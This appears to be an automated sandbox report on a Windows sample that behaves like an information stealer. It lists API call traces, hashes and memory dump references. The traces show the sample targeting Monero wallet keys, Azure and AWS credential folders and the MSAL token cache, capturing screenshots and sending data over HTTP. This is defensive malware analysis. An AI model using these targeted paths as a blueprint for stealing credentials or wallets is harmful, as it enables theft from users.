                          • lstrlen.KERNEL32(00000000), ref: 00AE5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00AE5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AE5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00AE5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AE5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AE5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00AE5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00AE5FBD
                          • HttpOpenRequestA.WININET(00000000,0179E318,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE5BF8
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00AE5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 2f7d6ba96a242ae72c60a6a6c1a6eca1628ca88c6ea4f29d14f07e2bc734c74b
                          • Instruction ID: 9eee3f406d8665e90d8f738f59d756c1d4d308e48d6de3f3950c968544500b08
                          • Opcode Fuzzy Hash: 2f7d6ba96a242ae72c60a6a6c1a6eca1628ca88c6ea4f29d14f07e2bc734c74b
                          • Instruction Fuzzy Hash: 701204B191011CABDB15EBE4DD95FEE7378BF24740F4041A9B20AA2191DF702B4ACFA5
                          Function 00AECEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AF8B60: GetSystemTime.KERNEL32(00B00E1A,01799AF0,00B005AE,?,?,00AE13F9,?,0000001A,00B00E1A,00000000,?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AF8B86
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00AECF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00AED0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AED0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED208
                          • lstrcat.KERNEL32(?,00B01478), ref: 00AED217
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED22A
                          • lstrcat.KERNEL32(?,00B0147C), ref: 00AED239
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED24C
                          • lstrcat.KERNEL32(?,00B01480), ref: 00AED25B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED26E
                          • lstrcat.KERNEL32(?,00B01484), ref: 00AED27D
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED290
                          • lstrcat.KERNEL32(?,00B01488), ref: 00AED29F
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED2B2
                          • lstrcat.KERNEL32(?,00B0148C), ref: 00AED2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 00AED2D4
                          • lstrcat.KERNEL32(?,00B01490), ref: 00AED2E3
                            • Part of subcall function 00AFA820: lstrlen.KERNEL32(00AE4F05,?,?,00AE4F05,00B00DDE), ref: 00AFA82B
                            • Part of subcall function 00AFA820: lstrcpy.KERNEL32(00B00DDE,00000000), ref: 00AFA885
                          • lstrlen.KERNEL32(?), ref: 00AED32A
                          • lstrlen.KERNEL32(?), ref: 00AED339
                            • Part of subcall function 00AFAA70: StrCmpCA.SHLWAPI(01798B28,00AEA7A7,?,00AEA7A7,01798B28), ref: 00AFAA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 00AED3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: ee4afc155d181a0d27e38223b37b4128cb260696e5f4c5e25e374fc0d028450d
                          • Instruction ID: 96055cf283269c0294e64f3c1bb392b7972fb733124db8f56cefa7bbba9af47d
                          • Opcode Fuzzy Hash: ee4afc155d181a0d27e38223b37b4128cb260696e5f4c5e25e374fc0d028450d
                          • Instruction Fuzzy Hash: A3E112B1910108ABCB14FBE4DE95EFE7378EF24341F104554F60AA61A1DF756A0ACBB2
                          Function 00AE4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                            • Part of subcall function 00AE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AE4839
                            • Part of subcall function 00AE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AE4849
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AE4915
                          • StrCmpCA.SHLWAPI(?,0179E258), ref: 00AE493A
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AE4ABA
                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B00DDB,00000000,?,?,00000000,?,",00000000,?,0179E248), ref: 00AE4DE8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AE4E04
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AE4E18
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AE4E49
                          • InternetCloseHandle.WININET(00000000), ref: 00AE4EAD
                          • InternetCloseHandle.WININET(00000000), ref: 00AE4EC5
                          • HttpOpenRequestA.WININET(00000000,0179E318,?,0179DDB0,00000000,00000000,00400100,00000000), ref: 00AE4B15
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                          • InternetCloseHandle.WININET(00000000), ref: 00AE4ECF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 460715078-2180234286
                          • Opcode ID: 0ca8474d8f9457e6571f9a187bdec1baf705ecf96cefbb6f599ee609994605ba
                          • Instruction ID: 511202f089c23ac447eecbab992db3fde87fddf281031920fd672569349bd0b8
                          • Opcode Fuzzy Hash: 0ca8474d8f9457e6571f9a187bdec1baf705ecf96cefbb6f599ee609994605ba
                          • Instruction Fuzzy Hash: E412C2B191011CAADB15EB94DD92FFEB778BF24340F5041A9B20A62091DF706F49CFA6
                          Function 00AEC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                            • Part of subcall function 00AFA920: lstrcpy.KERNEL32(00000000,?), ref: 00AFA972
                            • Part of subcall function 00AFA920: lstrcat.KERNEL32(00000000), ref: 00AFA982
                            • Part of subcall function 00AFA8A0: lstrcpy.KERNEL32(?,00B00E17), ref: 00AFA905
                            • Part of subcall function 00AFA9B0: lstrlen.KERNEL32(?,017988E8,?,\Monero\wallet.keys,00B00E17), ref: 00AFA9C5
                            • Part of subcall function 00AFA9B0: lstrcpy.KERNEL32(00000000), ref: 00AFAA04
                            • Part of subcall function 00AFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00AFAA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0179CB90,00000000,?,00B0144C,00000000,?,?), ref: 00AECA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00AECA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00AECA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AECAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00AECAD9
                          • StrStrA.SHLWAPI(?,0179CB00,00B00B52), ref: 00AECAF7
                          • StrStrA.SHLWAPI(00000000,0179CB18), ref: 00AECB1E
                          • StrStrA.SHLWAPI(?,0179D500,00000000,?,00B01458,00000000,?,00000000,00000000,?,01798AB8,00000000,?,00B01454,00000000,?), ref: 00AECCA2
                          • StrStrA.SHLWAPI(00000000,0179D5C0), ref: 00AECCB9
                            • Part of subcall function 00AEC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00AEC871
                            • Part of subcall function 00AEC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00AEC87C
                          • StrStrA.SHLWAPI(?,0179D5C0,00000000,?,00B0145C,00000000,?,00000000,01798AC8), ref: 00AECD5A
                          • StrStrA.SHLWAPI(00000000,01798808), ref: 00AECD71
                            • Part of subcall function 00AEC820: lstrcat.KERNEL32(?,00B00B46), ref: 00AEC943
                            • Part of subcall function 00AEC820: lstrcat.KERNEL32(?,00B00B47), ref: 00AEC957
                            • Part of subcall function 00AEC820: lstrcat.KERNEL32(?,00B00B4E), ref: 00AEC978
                          • lstrlen.KERNEL32(00000000), ref: 00AECE44
                          • CloseHandle.KERNEL32(00000000), ref: 00AECE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 38ec42ce049787056fe3e2f4b29286e77806fcffc75e197eea9dd08d775fb07d
                          • Instruction ID: 6e67245c94540e557a051d44ff0c704d3cacc830ae3995f13fbdf4128a9fa081
                          • Opcode Fuzzy Hash: 38ec42ce049787056fe3e2f4b29286e77806fcffc75e197eea9dd08d775fb07d
                          • Instruction Fuzzy Hash: 90E1EEB190010CABDB14EBE4DD91FEEB778AF24340F404169F20AA7191DF706A4ACBA5
                          Function 00AF8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • RegOpenKeyExA.ADVAPI32(00000000,0179AD88,00000000,00020019,00000000,00B005B6), ref: 00AF83A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AF8426
                          • wsprintfA.USER32 ref: 00AF8459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00AF847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00AF8499
                            • Part of subcall function 00AFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00AFA7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: fbaf7d8df167b1a374aac63ac4fb99f3fa54023f369a15e971ec10506047bff3
                          • Instruction ID: 7607aca2db3fe1a399b922f80e9a3d6f3835a5a1b101e5749a8f3cb744c8d207
                          • Opcode Fuzzy Hash: fbaf7d8df167b1a374aac63ac4fb99f3fa54023f369a15e971ec10506047bff3
                          • Instruction Fuzzy Hash: 57810FB191011C9BDB24DB94CD91FEAB7B8FB14700F008699F209A6150DF756B86CFA1
                          Function 00AF4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AF8E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00AF4DCD
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF492C
                            • Part of subcall function 00AF4910: FindFirstFileA.KERNEL32(?,?), ref: 00AF4943
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00AF4E59
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FDC), ref: 00AF4971
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B00FE0), ref: 00AF4987
                            • Part of subcall function 00AF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AF4B7D
                            • Part of subcall function 00AF4910: FindClose.KERNEL32(000000FF), ref: 00AF4B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00AF4EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00AF4EE5
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF49B0
                            • Part of subcall function 00AF4910: StrCmpCA.SHLWAPI(?,00B008D2), ref: 00AF49C5
                            • Part of subcall function 00AF4910: wsprintfA.USER32 ref: 00AF49E2
                            • Part of subcall function 00AF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00AF4A1E
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,0179E328), ref: 00AF4A4A
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,00B00FF8), ref: 00AF4A5C
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,?), ref: 00AF4A70
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,00B00FFC), ref: 00AF4A82
                            • Part of subcall function 00AF4910: lstrcat.KERNEL32(?,?), ref: 00AF4A96
                            • Part of subcall function 00AF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00AF4AAC
                            • Part of subcall function 00AF4910: DeleteFileA.KERNEL32(?), ref: 00AF4B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 44be18e10be3288d21edf8324f2c9187de13313e9665f6d773555c37196f5ce8
                          • Instruction ID: 1310deb7cfe49704b9406cda62a05ff9ecada813c020545a82ea847aa82945e5
                          • Opcode Fuzzy Hash: 44be18e10be3288d21edf8324f2c9187de13313e9665f6d773555c37196f5ce8
                          • Instruction Fuzzy Hash: DF4198B9A4030867DB14F7B0ED47FED7778AB64700F004994B289661C1FEB457C99BA2
                          Function 00AF9010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00AF906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                          • Associated: 00000000.00000002.1481675308.0000000000AE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000B9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000BC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481691733.0000000000D2A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000EC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1481830569.0000000000FE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482064448.0000000000FE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482173330.0000000001189000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1482186524.000000000118A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_ae0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateGlobalStream
                          • String ID: image/jpeg
                          • API String ID: 2244384528-3785015651
                          • Opcode ID: b2fc03f35333279c498af3f6001f35d82e51e136e97953a13eac6ff3b35a8b4a
                          • Instruction ID: d16ff422dc0115a439567a301e6fe0b45b9c67043f3fc6d71e06044bd3d1dff0
                          • Opcode Fuzzy Hash: b2fc03f35333279c498af3f6001f35d82e51e136e97953a13eac6ff3b35a8b4a
                          • Instruction Fuzzy Hash: F671EAB1910308ABDB14EBE8DD89FEEB7B8FB58700F108518F615E7290DB34A905CB61
                          Function 00AF2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00AFA740: lstrcpy.KERNEL32(00B00E17,00000000), ref: 00AFA788
                          • ShellExecuteEx.SHELL32(0000003C), ref: 00AF31C5
